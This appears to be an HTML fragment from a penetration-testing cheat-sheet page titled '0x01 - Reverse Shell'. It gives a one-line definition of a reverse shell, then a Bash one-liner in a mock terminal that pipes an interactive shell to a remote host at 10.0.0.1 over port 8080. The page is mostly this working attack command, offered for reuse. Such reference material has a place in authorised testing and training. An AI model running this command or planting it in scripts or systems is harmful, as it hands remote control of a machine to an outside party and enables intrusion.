<!-- Begin page content -->
<main class="flex-shrink-0">
    <div class="container">
        <div class="row">
            <h1 class="mt-5">0x01 - Reverse Shell</h1>
            <hr>
            <p class="lead">
                A reverse shell is a shell session established on a connection that is initiated from a <code>remote machine</code>, not from the local host.
            </p>
        </div>
        <br><br>
        <div class="row">
            <h2>Bash</h2>
            <hr>

            <div class="window_container">
                <div class="window_content">
                    <div class="window_top">
                        <span class="window_dot bg-danger"></span>
                        <span class="window_dot bg-warning"></span>
                        <span class="window_dot bg-success"></span>
                        <span class="window_title">Hostname</span>
                    </div>
                    <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">pentest@0x65</span><span class="text-success">[/home]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash"><span class="token function">bash -i >& /dev/tcp/10.0.0.1/8080 0>&1</span></span></span><span class="token output">
</span></code></pre></div>
            </div>
        </div>
    </div>
</main>